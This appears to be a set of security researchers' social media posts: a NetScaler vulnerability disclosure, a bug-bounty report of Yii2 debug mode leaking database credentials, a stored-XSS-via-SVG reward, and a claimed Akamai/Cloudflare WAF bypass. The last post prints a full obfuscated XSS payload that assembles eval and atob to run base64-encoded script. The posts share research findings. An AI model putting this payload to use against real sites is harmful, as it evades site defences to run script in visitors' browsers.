What do we even say at this point?
CVE-2026-8451, a zero-day Memory Overread that watchTowr Labs identified in Citrix NetScaler appliances in March, has just been publicly disclosed with patches.
We're not done yet... speak soon... ;-)
https://t.co/MAzxLkbbsZ
New subdomain went live
Yii2 debug mode enabled → Full database credentials leaked in stack trace
Just 3 hours later → Access Forbidden
Continuous monitoring isn’t optional
Note: This subdomain was only discoverable via DNS brute-force
It's time for sharing, this is not a simple write-up, we are sharing our methodology and reasoning, detailing how we approached and hunted the flaw, I hope you like it :]
https://t.co/MNmJyNZVBg
Yay, i was rewarded $1500
Bug: Stored XSS via an SVG file led to full account data exposure
Tip: Always try to exploit XSS and don’t just report it with a simple alert
I just found a WAF bypass for Akamai and Cloudflare:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>